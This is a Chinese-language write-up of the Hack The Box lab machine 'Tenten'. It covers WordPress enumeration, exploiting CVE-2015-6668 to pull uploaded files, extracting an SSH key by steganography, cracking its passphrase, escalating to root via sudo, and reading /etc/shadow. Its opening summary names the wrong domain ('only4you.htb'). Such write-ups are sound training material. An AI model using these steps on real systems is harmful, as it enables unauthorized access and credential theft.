Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P
非常推薦: 想要變强嗎? 快來加入 HTB Academy 獲得更高級的知識吧 :P
Tenten
https://www.hackthebox.com/achievement/machine/463126/8
首先使用 nmap 工具對目標進行掃描,發現僅開啟了 80 端口,並找到了域名 only4you.htb。進一步訪問該網站後,注意到頁面底部有一個 “Jobs Listing” 的鏈接,點擊進入後發現不同職位的編號,透過改變數字可以獲取不同的職位信息,並利用 curl 和 grep 工具快速提取所有職位名稱。經過整理,得知該網站基於 WordPress 架構,因此使用 wpscan 對其進行漏洞掃描,發現一個名為 job-manager 的插件可能存在安全隱患。經過研究後,發現該插件會將上傳的簡歷存放在特定的 URL 路徑下,若攻擊者知道文件名稱,便可透過爆破年月和文件後綴名來下載該文件。為了獲取文件名稱,將之前收集到的職位名稱進行測試,最終成功下載到包含隱藏信息的圖片。經過分析,發現圖片中隱藏了 id_rsa 密鑰,使用 steghide 工具將其提取出來,但該密鑰設有密碼。透過 ssh2john 將密碼雜湊值導出後,使用 hashcat 破解密碼,最終獲得密碼。接著,雖然手中只有 id_rsa 密鑰而沒有用戶名,於是進一步在 WordPress 中查找,發現一位名為 takis 的用戶發表了文章,嘗試用該用戶名登錄,成功獲得 user.txt 文件。隨後,利用 sudo -l 命令檢查權限,發現能夠以 root 身份執行 bash,最終通過 sudo /bin/fuckin bash 獲得系統的完全控制權。
Nmap Tcp scan
使用nmap掃一下
1 | PORT STATE SERVICE REASON VERSION |
看起來只是開了80端口。
Wordpress
從上面的結果中可以看到存在 only4you.htb
這個域名,所以可以簡單的掃一下子域名,結果什麽也沒有。
打開 only4you.htb
發現底部有 Jobs Listing
:
點擊後來到:
當我點擊 Pen Tester
的時候發現上面有一個數字:
如果我改成 7 會發現是 Register
Getting jobs name with curl
使用 curl + grep
可以快速得到名字:
1 | $ curl -s http://tenten.htb/index.php/jobs/apply/1/ | grep entry-title |
然後從1循環到50,把所有jobs的名字給dump下來:
1 | $ seq 50 | xargs -I $ bash -c "echo $ ; curl -s http://tenten.htb/index.php/jobs/apply/$/ | grep entry-title" |
看起來只有20個,重新循環,然後嘗試整理下jobs name:
1 | $ seq 20 | xargs -I $ bash -c "curl -s http://tenten.htb/index.php/jobs/apply/$/ | grep entry-title" |
最後得到:
1 | Application |
Using wpscan to scan wordpress
由於沒有發現到什麽内容,再加上它是wordpress的框架,所以使用 wpscan
探測下:
1 | $ wpscan --url http://tenten.htb/ --api-token xxxxxxxxxxxxx --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive -t 30 |
看到有一個插件是 job-manager
。
Bruteforce and Exploit with cve-2015-6668
搜索了一下如何 explot :
找到了這個:
簡單來説會把上傳的CV 放在 http://wpserver/wp-content/uploads/<year>/<Month>/<filename>.<ext>
。
如果攻擊者知道文件名字的話,通過爆破年月和文件的後綴名就能下載到文件,也就是說他需要名字。
所以可以把 jobs 的名字放進去跑跑看:
修改的内容:
1 | FILE_NAMES = ["Application", "Auto Draft", "HackerAccessGranted", "Job Application", "Jobs Listing", "Pen Tester", "Register", "Sample Page", "cube"] |
運行後得到:
1 | http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg |
在第二個鏈接打開後出現 htb 的logo:
在第一個中出現:
Unzip ssh key from steghide
找了很久沒找到些什麽内容,所以很有可能是圖片裏面藏東西了,也就是圖片隱寫術,參考:https://book.hacktricks.xyz/crypto-and-stego/stego-tricks
使用 steghide
看了一下之後,果然圖片裏面藏了 id_rsa
:
1 | $ steghide info HackerAccessGranted.jpg |
所以可以使用 steghide
把 id_rsa
提取出來:
1 | $ steghide extract -sf HackerAccessGranted.jpg |
但是這個 id_rsa
是有密碼的,使用 ssh2john
導出來后,就可以使用hashcat來破解:
1 | $ ssh2john id_rsa |
最後得到解密 id_rsa
的密碼:
1 | superpassword |
只有id_rsa
沒有用戶名,那就去 wordpress 裏面找,發現:
有一個 takis
的用戶發表了文章,嘗試使用該用戶登錄:
得到 user.txt
,所以順手sudo -l
看一下:
那其實和 bash 沒什麽區別,直接 sudo /bin/fuckin bash
就得到 root了。
Hashes
1 | root@tenten:/root# cat /etc/shadow |
Thanks
Respect: If my writeup really helps you, Give me a respect to let me know, Thankssssss!
感謝: 製作不易,如果我的writeup真的幫到你了, 給我一個respect,這樣我就會知道,感謝你!
Found Mistakes: If you find something wrong in the page, please feel free email to mane@manesec.com thanksss !!!
發現一些錯誤: 如果你在文章中發現一些錯誤,請發郵件到 mane@manesec.com ,麻煩了!!
Beginner Recommand: If you are a beginner, please use this link to sign up for an HTB Academy to get more Higher level of knowledge.
新手非常推薦: 如果你是初學者,可以用此鏈接來嘗試注冊 HTB Academy 賬號。
使用上面的鏈接加入 HTB 的 academy 完成 INTRODUCTION TO ACADEMY
這個模塊后可以解鎖更多的功能!
Join HTB’s academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)